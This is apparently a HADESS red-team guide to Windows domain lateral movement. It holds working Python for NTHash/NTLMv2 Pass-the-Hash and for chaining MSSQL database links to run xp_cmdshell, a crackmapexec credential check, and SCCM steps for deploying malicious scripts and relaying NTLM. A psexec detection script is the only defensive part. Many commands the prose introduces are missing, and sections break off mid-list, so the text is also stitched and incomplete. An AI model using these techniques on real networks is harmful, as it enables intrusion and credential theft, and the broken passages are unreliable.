Lateral Movement
HADESS WWW.HADESS.IO
Introduction
In the realm of cybersecurity, the concept of lateral movement has become a critical focal point
for defenders and attackers alike. As organizations fortify their defenses against external
threats, adversaries seek alternative routes to infiltrate networks and systems. This intricate
dance of offense and defense unfolds within the domain of lateral movement, where attackers
leverage various techniques to navigate through a network once initial access has been
achieved.
One of the fundamental pillars of lateral movement is the exploitation of passwords. Whether
through brute-force attacks, password spraying, or the reuse of weak or recovered credentials,
attackers exploit the weaknesses inherent in password-based authentication. A password
represents not just a string of characters, but often a gateway to deeper network
access and control.
Abuse of the SMB (Server Message Block) protocol is another avenue for lateral
movement. With valid credentials or hashes, attackers can reach shared resources over SMB and
execute commands on remote systems, effectively expanding their reach within the network.
Kerberos-related techniques, such as Pass the Ticket and Pass the Certificate, exploit
weaknesses in how credentials are issued and validated to move laterally within a network. These
techniques capitalize on trust relationships and on how key material is stored and reused to bypass
security controls.
Additionally, attackers exploit weaknesses in enterprise systems such as WSUS (Windows Server
Update Services) and SCCM (System Center Configuration Manager) to further their lateral
movement efforts. By compromising these systems, attackers can manipulate software
deployment processes, harvest credentials, and establish persistent access within the network.
In the complex landscape of lateral movement, defenders must remain vigilant, continuously
adapting their strategies to detect and mitigate evolving threats. By understanding the
techniques employed by attackers and implementing robust security measures, organizations
can defend against the persistent threat of lateral movement and safeguard their critical assets.
To be the vanguard of cybersecurity, Hadess envisions a world where digital assets are safeguarded from malicious actors. We strive to create a secure digital ecosystem, where
businesses and individuals can thrive with confidence, knowing that their data is protected. Through relentless innovation and unwavering dedication, we aim to establish Hadess as a
symbol of trust, resilience, and retribution in the fight against cyber threats.
Document info
HADESS
At Hadess, our mission is twofold: to unleash the power of white hat hacking in punishing black
hat hackers and to fortify the digital defenses of our clients. We are committed to employing our
elite team of expert cybersecurity professionals to identify, neutralize, and bring to justice those
who seek to exploit vulnerabilities. Simultaneously, we provide comprehensive solutions and
services to protect our clients' digital assets, ensuring their resilience against cyber attacks. With
an unwavering focus on integrity, innovation, and client satisfaction, we strive to be the guardian
of trust and security in the digital realm.
Security Researcher
Amir Gholizadeh (@arimaqz), Surya Dev Singh (@kryolite_secure)
Key Findings
Attacks
HADESS.IO Pwning the Domain: Lateral Movement
Lateral movement in red teaming is all about moving between targets in the environment to reach the objective.
Password
When you find a password you can pass it to different services to check whether it grants access. In this article we'll go
through a few of them.
WinRM
WinRM is a management protocol used to remotely communicate with another system in the Windows realm. You can pass
the password to this service to gain access if it’s enabled:
In this scenario we have a password which we passed to WinRM using the ‘evil-winrm’ tool.
RDP
RDP is a protocol for remotely controlling desktop sessions. Once again we can pass our password to this service if it is enabled:
In this scenario we have used 'xfreerdp' to speak RDP and gained access to the system through a graphical
interface.
MSSQL
We can also pass the password to the MSSQL service, if it is enabled and the account is authorized, to exfiltrate sensitive
information or to execute OS commands. To check whether MSSQL on the target accepts these credentials:
crackmapexec mssql 192.168.100.100 -u 'matrix\administrator' -p 'P@$$W0rd'
SMB
SMB is a file sharing protocol widely used in the Windows realm. To check whether the credentials are accepted and which shares are accessible:
And finally to connect to the target share, which in our case is 'Users':
Interactive-shell
There are many tools that give us an interactive shell by abusing protocols such as SMB. 'psexec'
from 'impacket' is one of the most popular:
As you can see, it finds a writable share and uploads a binary, then creates a service pointing at that file and starts it,
which runs the binary and gives us 'nt authority\system' access to the system.
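The service-install behaviour described above is also the place a defender catches it: every service creation lands in the System log as event 7045. The following is an added example (not the article's or impacket's code) that scores constructed 7045 lines for the psexec pattern. The key=value export format, the loopback-share heuristic and the random-name heuristic are assumptions, not a vendor signature; adjust field names to your SIEM.

```python
"""Flag psexec-style service installs in Windows System log 7045 events
("A service was installed in the system"). Added example, not from the article
or impacket. The event lines are constructed in a flat key=value export format
(your SIEM's field names will differ), and the heuristics encode the behaviour
described above (a binary dropped on an admin share and registered as a
service); they are assumptions, not a vendor signature."""
import re

SAMPLE_EVENTS = [  # constructed sample events
    r"EventID=7045 ServiceName=WSearch ImagePath=%SystemRoot%\system32\SearchIndexer.exe /Embedding AccountName=LocalSystem",
    r"EventID=7045 ServiceName=hRjQ ImagePath=\\127.0.0.1\ADMIN$\kLmPqRsT.exe AccountName=LocalSystem",
    r"EventID=7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\PSEXESVC.exe AccountName=LocalSystem",
    r"EventID=7045 ServiceName=BTAGService ImagePath=C:\Windows\system32\svchost.exe -k BthAppGroup AccountName=LocalSystem",
    r"EventID=7036 ServiceName=hRjQ State=running",
]

# Service binary fetched back from the host's own admin share over loopback,
# the shape a share-upload-then-service tool leaves behind (assumption).
LOOPBACK_SHARE = re.compile(r"^\\\\(127\.0\.0\.1|localhost)\\[^\\]+\$\\", re.IGNORECASE)
# Short all-letter name; combined below with an unusual lower-to-upper case change, e.g. 'hRjQ'.
RANDOM_NAME = re.compile(r"^[A-Za-z]{1,8}$")


def parse_event(line: str) -> dict:
    """Split 'k=v k=v' while keeping spaces inside values such as command lines."""
    return dict(part.split("=", 1) for part in re.split(r" (?=\w+=)", line))


def classify(event: dict):
    """Score a 7045 event; returns (score, reasons). Strong signals weigh 2, weak ones 1."""
    if event.get("EventID") != "7045":
        return 0, []
    name = event.get("ServiceName", "")
    path = event.get("ImagePath", "")
    score, reasons = 0, []
    if LOOPBACK_SHARE.match(path):
        score += 2
        reasons.append("service binary served from a loopback admin share")
    if name.upper() == "PSEXESVC" or path.upper().endswith("\\PSEXESVC.EXE"):
        score += 2
        reasons.append("Sysinternals PsExec service")
    if RANDOM_NAME.match(name) and re.search(r"[a-z][A-Z]", name):
        score += 1
        reasons.append("random-looking service name")
    return score, reasons


def scan(lines, threshold: int = 2):
    """Return (ServiceName, reasons) for every service install that reaches the threshold."""
    hits = []
    for line in lines:
        event = parse_event(line)
        score, reasons = classify(event)
        if score >= threshold:
            hits.append((event.get("ServiceName", ""), reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_EVENTS):
        print(name, "->", "; ".join(reasons))
```

The weak name heuristic alone never reaches the threshold on its own, which keeps legitimate services with odd names out of the alert queue; pair the 7045 hit with the preceding SMB logon (4624 type 3) and the ADMIN$ share access (5140) from the same source to confirm.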
Other tools in the same suite achieve a similar result by different means:
And 'wmiexec':
NTHash
NTLMv1, NTLMv2 and NTHash are confusing terms that are often used interchangeably, so let's settle this once and for all:
NTHash: the MD4 hash of the UTF-16LE encoded password. It is stored locally in the SAM hive and, for domain accounts, in the
NTDS.dit database on domain controllers.
NTLMv1: a challenge/response protocol that authenticates to a system using the NTHash as the key; the password itself is never sent.
NTLMv2: the newer version of the NTLM protocol with some adjustments (HMAC-MD5, a client nonce and a timestamp) but the same concept.
Pass-the-Hash
PtH, or Pass-the-Hash, is an attack where the attacker authenticates with the NTHash instead of the password. Remember
how NTLM works? The end user types a password, the client hashes it into the NTHash and then uses that hash as the key
for the NTLM challenge/response. In PtH, instead of typing the password and letting the client derive the hash, we supply
an already obtained NTHash directly, skipping those steps before authentication. The target cannot tell the difference,
because the hash is all the protocol ever used.
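To make the NTHash and Pass-the-Hash reasoning concrete, here is an added example (not the article's code) that derives the NTHash from a password, computes an NTLMv2 response from the hash alone, and shows that a dumped hash produces exactly the proof the password would. MD4 is implemented inline because hashlib's md4 is often unavailable on OpenSSL 3 builds; the account name, challenges and timestamp are constructed, and the empty target-info list stands in for a real AV_PAIR list.

```python
"""NTHash, NTLMv2 and Pass-the-Hash worked through offline. This is an added
example, not the article's code: MD4 is implemented inline because hashlib's
md4 is often unavailable on OpenSSL 3 builds. The NTLMv2 layout follows
MS-NLMP; the account names, challenges and timestamp below are constructed."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest (little-endian words, three 16-step rounds)."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), tuple((i % 4) * 4 + i // 4 for i in range(16))),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: the next step updates the old d
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. This is the value stored in
    the SAM hive / NTDS.dit and dumped by tools such as secretsdump."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The 'temp' structure of MS-NLMP 3.3.2: version bytes, six zero bytes,
    FILETIME, 8-byte client nonce, zero dword, AV_PAIR list, zero dword."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nthash: bytes, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """NtChallengeResponse = NTProofStr || blob. Note the inputs: the NTHash is the
    key and the password never appears, which is exactly what Pass-the-Hash exploits."""
    key = hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def hashcat_5600_line(user: str, domain: str, server_challenge: bytes, response: bytes) -> str:
    """The NetNTLMv2 line format Responder/ntlmrelayx write and hashcat -m 5600 reads."""
    return f"{user}::{domain}:{server_challenge.hex()}:{response[:16].hex()}:{response[16:].hex()}"


def pass_the_hash_round_trip(dumped_hash_hex: str, password: str) -> bool:
    """Show that a dumped NTHash yields the same NTLMv2 proof as the password would.
    Constructed challenge, nonce and timestamp stand in for a captured exchange."""
    server_challenge = bytes.fromhex("0123456789abcdef")
    blob = ntlmv2_blob(0x01D9E2F0A1B2C3D4, bytes.fromhex("1122334455667788"), b"")
    from_hash = ntlmv2_response(bytes.fromhex(dumped_hash_hex), "administrator", "MATRIX", server_challenge, blob)
    from_password = ntlmv2_response(nt_hash(password), "administrator", "MATRIX", server_challenge, blob)
    return from_hash == from_password


if __name__ == "__main__":
    print(nt_hash("password").hex())  # 8846f7eaee8fb117ad06bdd830b7586c
    print(pass_the_hash_round_trip("8846f7eaee8fb117ad06bdd830b7586c", "password"))  # True
```

The same hashcat_5600_line() layout is what you get back from a coerced or relayed NetNTLMv2 exchange: the server challenge, the 16-byte NTProofStr and the blob are all that mode 5600 needs, which is why those captures crack offline.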
Overpass-the-Hash
PtH is good and all, but what if we want to pass a ticket instead of a hash? With an NTHash we can use it as the account's RC4
Kerberos key to request a TGT for ourselves and then pass that ticket, which is exactly what Overpass-the-Hash is about.
Pass-the-Key
In Kerberos authentication, we can provide 5 types of keys. 4 symmetric keys:
MSSQL
Execute OS Commands
The `xp_cmdshell` procedure can be used to execute shell commands on the SQL server if you have **sysadmin
privileges**. The `Invoke-SQLOSCmd` cmdlet from `PowerUpSQL` provides a simple means of using it.
If a user has privileges to access an MSSQL instance, they may be able to execute commands on the MSSQL host (if
running as SA). An MSSQL instance can also be trusted by a different MSSQL instance through a database link.
If the user has privileges over the linked instance, they can use that
trust relationship to execute queries on the other instance as well. These trusts can
be chained, and at some point the user may find a misconfigured
instance where they can execute commands or stored procedures. Database links
work even across forest trusts.
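Chaining links by hand mostly fails on quoting: every hop wraps the inner statement in a string literal, so each embedded single quote has to be doubled once per hop. The following added example (not the article's or PowerUpSQL's code) builds correctly nested OPENQUERY and EXEC ... AT statements for a chain of links. The link names SQL01/SQL02 are constructed, and 'RPC Out' being enabled on each hop is an assumption that the EXEC AT form depends on.

```python
"""Nest T-SQL through a chain of MSSQL database links. Added example, not
the article's or PowerUpSQL's code. Each hop wraps the inner statement in a
string literal, so every embedded single quote is doubled once per hop; that
escaping, not the SQL itself, is what usually breaks by hand. Link names
(SQL01, SQL02) are constructed and 'RPC Out' availability is an assumption."""


def _literal(stmt: str) -> str:
    """Embed a statement as a T-SQL string literal, doubling embedded quotes."""
    return "'" + stmt.replace("'", "''") + "'"


def chain_openquery(links, query: str) -> str:
    """SELECT * FROM OPENQUERY([hop], '...') nested from the far end inwards.
    Works without 'RPC Out', but the innermost statement must return a rowset."""
    for link in reversed(links):
        query = f"SELECT * FROM OPENQUERY([{link}], {_literal(query)})"
    return query


def chain_exec_at(links, statement: str) -> str:
    """EXEC ('...') AT [hop] nested from the far end inwards. Requires 'RPC Out'
    on every link but can run statements with no result set (sp_configure)."""
    for link in reversed(links):
        statement = f"EXEC ({_literal(statement)}) AT [{link}]"
    return statement


def enumerate_links_query(links) -> str:
    """Query to discover the next hop's links, sent through the chain so far."""
    return chain_openquery(links, "SELECT srvname FROM master..sysservers WHERE srvname <> @@servername")


def xp_cmdshell_over_links(links, command: str):
    """Two statements: enable xp_cmdshell at the last hop, then run a command there.
    The link login on the final hop holding the sysadmin role is assumed."""
    enable = ("EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
              "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;")
    run = f"EXEC master..xp_cmdshell {_literal(command)}"
    return chain_exec_at(links, enable), chain_exec_at(links, run)


if __name__ == "__main__":
    hops = ["SQL01", "SQL02"]
    print(enumerate_links_query(hops))
    for stmt in xp_cmdshell_over_links(hops, "whoami"):
        print(stmt)
```

Run enumerate_links_query() on the entry instance, extend the list with each link it returns, and repeat; that is the crawl PowerUpSQL's Get-SQLServerLinkCrawl automates. Use the OPENQUERY form when RPC Out is off, and the EXEC AT form when you need to change configuration at the far end.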
Credential Harvest
**Credential harvesting** can be used for lateral movement and privilege escalation. It covers all the ways
to retrieve SCCM-related credentials in the environment. Most commonly you can
harvest SCCM credentials from these three locations:
- Locally on an SCCM (Windows) client, most commonly stored in the WMI database or cached in the CIM store; some
might also appear in SCCM log files.
- Locally on an SCCM member server, where the SCCM Management Point (MP) usually hosts the biggest pot of gold.
- In policy definitions that can be fetched remotely from Management Points.
The NAA (Network Access Account) doesn't need to be privileged on the domain, but it does happen that administrators give
these accounts far more privileges than they need.
**It is worth noting that, even after the NAA is deleted or changed in the SCCM configuration, the client's on-disk WMI/CIM
repository may still contain the old encrypted credentials on enrolled computers.**
Here are all the ways to extract SCCM credentials using the NAA:
Now we can coerce these accounts into authenticating to our machine. We can then either crack the captured hashes to
recover credentials or relay the authentication to other hosts to move laterally. The main requirement is that the Client
Push account has local admin on all clients for this to work.
Note that we capture both the machine account and the Client Push account. Password cracking can be attempted using
mode 5600 (NetNTLMv2) in `hashcat`.
A few things to take into consideration while deploying the script or application:
- Plan which script you want to deploy and where; you won't be spraying the payload on every client machine.
- Add your target to a collection and then deploy your malicious script to that collection.
- Ensure you have sufficient administrative privileges to create a device collection, add devices, create an application
and deploy it.
- Cleanup: undo all your steps (delete the application, delete the device collection you created) after your
attempt.
For exploitation we can use **SharpSCCM** again. Here is the step-by-step guide to deploy our malicious script /
application in an SCCM environment:
From the output, note down the device's resource name or resource ID (`ResourceName: XXX`, `ResourceID: XXXX`);
we will use the **ResourceID** for exploitation.
Instead of deploying an application to the target machine, we will simply trigger an install from a remote UNC path in order to
capture or relay the incoming NTLM authentication. This is stealthier, the target device is more likely to support
NTLM, and most importantly we can capture the NTLM authentication of either the user logged on to the client or the
machine account (our choice).
We can do so very easily with SharpSCCM.exe, since we already have the ResourceID of the target we want to deploy the
script to. We can use the following command:
This will relay the authentication; alternatively we can capture the NetNTLM hash with `PCredz` running at the same time, or
move laterally within the network by relaying it.
Also note that we've chosen to execute the deployment in the context of the logged-on user. To trigger the
deployment using the target device's computer account instead, use the flag `-s` or `--run-as-system`.
Conclusion
In conclusion, the exploration of lateral movement techniques reveals the multifaceted nature of
cyber threats and the sophisticated tactics employed by adversaries to navigate through
networks. Techniques such as password passing, Pass the Hash, and Pass the Ticket highlight the
weaknesses inherent in authentication mechanisms, while protocols like WinRM, RDP, and
MSSQL serve as conduits for remote access to systems. Additionally, attackers abuse the SMB
protocol and interactive-shell tooling to move further through networks and execute
arbitrary commands. The manipulation of enterprise systems such as WSUS and SCCM
underscores the importance of securing software deployment processes and safeguarding
credentials.
Overall, the study of lateral movement underscores the dynamic nature of cyber threats, with
attackers continuously evolving their tactics to bypass security measures and maintain access
within compromised networks. Defenders must remain vigilant, staying abreast of the latest
trends in lateral movement and implementing robust security measures to mitigate the risk of
unauthorized access and data exploitation. By adopting proactive defense strategies and fostering
a culture of cybersecurity awareness, organizations can better protect their critical assets and
mitigate the impact of cyber threats in the ever-changing landscape of cybersecurity.
HADESS
cat ~/.hadess
Website: WWW.HADESS.IO
Email: [email protected]